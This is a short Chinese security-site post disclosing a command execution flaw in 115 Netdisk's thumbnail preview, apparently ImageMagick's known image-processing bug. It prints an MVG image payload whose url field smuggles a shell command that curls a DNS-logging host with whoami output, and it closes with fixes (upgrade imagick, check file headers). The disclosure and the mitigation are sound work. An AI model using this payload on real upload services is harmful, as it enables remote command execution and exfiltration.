频道栏目
首页 > 资讯 > 网站安全 > 正文

115网盘命令执行漏洞

16-06-20        来源:[db:作者]  
收藏   我要投稿

凑个热闹

115网盘上的一个应用场景,回想起来115网盘上传文件后会产生缩略图预览,那会不会有问题呢?

还是提交那几行代码:

push graphic-context

viewbox 0 0 640 480

fill 'url(https://"|curl http://`whoami`.xxx.dnslog.info")'

pop graphic-context

发现没有判断文件格式直接进行了转换:

 

11.png

 

cloudeye显示:

 

22.png

 

cloudeye显示:

 

22.png

 

 

11.png

 

解决方案:

1.升级imagick

2.科学地说,生成预览之前请判断合适的文件头

相关TAG标签
上一篇:安居客某处命令执行漏洞
下一篇:广州长城宽带网上营业厅订单遍历(可获取姓名/身份证号/详细地址)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站